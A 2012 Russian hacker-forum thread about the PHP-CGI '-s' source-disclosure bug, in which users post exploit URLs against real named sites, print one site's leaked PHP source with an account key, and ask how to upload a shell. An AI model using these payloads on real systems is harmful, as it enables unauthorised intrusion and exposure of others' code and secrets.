Критическая уязвимость PHP случайно опубликована в открытом доступе

Discussion in 'Мировые новости. Обсуждения.' started by d3l3t3, 5 May 2012.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to alextrust, ну раз не догоняешь, значит и не надо пытаться! :)
     
  2. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    vk.com
     
  3. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    to cat1vo
    а ты когда в детстве ходить не умел ты не пытался...просто сразу встал пошел?)
     
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Нет, я просто вдумчиво читал!
     
  5. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    работать буде только когда php выполняется как cgi
    но как узнать это, выполняется ли скрипт через cgi или просто mod_php ?
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    через phpinfo, например.

    P.S. http://goo.gl/Ktf3o
     
  7. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    Наверное я один прочитал пост Конки
     
  8. MaDDogg

    MaDDogg Member

    Joined:
    7 Jan 2010
    Messages:
    24
    Likes Received:
    5
    Reputations:
    1
    http://www.99mb.ru/?-s
     
  9. tux

    tux Elder - Старейшина

    Joined:
    26 Mar 2009
    Messages:
    423
    Likes Received:
    231
    Reputations:
    67
    Угу. Вот только выводит оно тот же самый HTML-код, который и так можно получить с той же странички. :)
    Неплохо сначала проверять то, что постишь. Не в обиду.
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    ты хоть листал сорсы до конца?

    PHP:
    <?php 

    if (!defined('_SAPE_USER')){ 
            
    define('_SAPE_USER''cc475572057f45eed47034c528f6fc3d');  

    require_once(
    $_SERVER['DOCUMENT_ROOT'].'/2cc475572057f45eed47034c528f6fc3d/sape.php');  

    $o = array(); 
    $o['host'] = 'www.99mb.ru'
    $o['charset'] = 'UTF-8'
    $o["request_uri"] = $_SERVER['REQUEST_URI']; 


    $sape = new SAPE_client($o); 

     echo 
    $sape->return_links();  

    ?>
     
    _________________________
  11. tux

    tux Elder - Старейшина

    Joined:
    26 Mar 2009
    Messages:
    423
    Likes Received:
    231
    Reputations:
    67
    Хм. Слона то я и не приметил. :)
     
  12. proroot

    proroot Member

    Joined:
    31 Jan 2012
    Messages:
    46
    Likes Received:
    5
    Reputations:
    0
    Круто блять :)
     
  13. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Чот вообще не пойму. По выдаче по запросу подобному тому какой запостил попугай, ни на одном сайте не работает. А здесь - http://www.99mb.ru/ - работает. Хрень какая то, это при том что вроде как писали, что при nginx - не работает. А ведь тут как раз стоит этот самый nginx
     
  14. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    Если бы сорсы любого файла можно было глянуть, а так, почти, бесполезно. Все конфигурации и пароли инклудят в основном
     
  15. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    почему бы и нет?
    http://www.kathleenhills.co.uk/includes/db.php?-s
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    там апач, + api "CGI"

     
    _________________________
  17. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,160
    Likes Received:
    366
    Reputations:
    226
    http://noc.wikimedia.org/conf/highlight.php?file=db.php?-s

    ы)
     
  18. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    95
    Likes Received:
    66
    Reputations:
    48
    ну если "воспринимается как прямая команда -s к бинарнику php-cgi."
    А какие еще команды можно выполнять?
    Конечно же интересуют способы залить шелл или выполнение произовольного кода
     
  19. stilyaga22

    stilyaga22 New Member

    Joined:
    7 Dec 2011
    Messages:
    72
    Likes Received:
    2
    Reputations:
    3
    круто круто )
    блин знал бы только я один об этой язве :D
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://noc.wikimedia.org/conf/highlight.php

    what what?
     
    _________________________
Loading...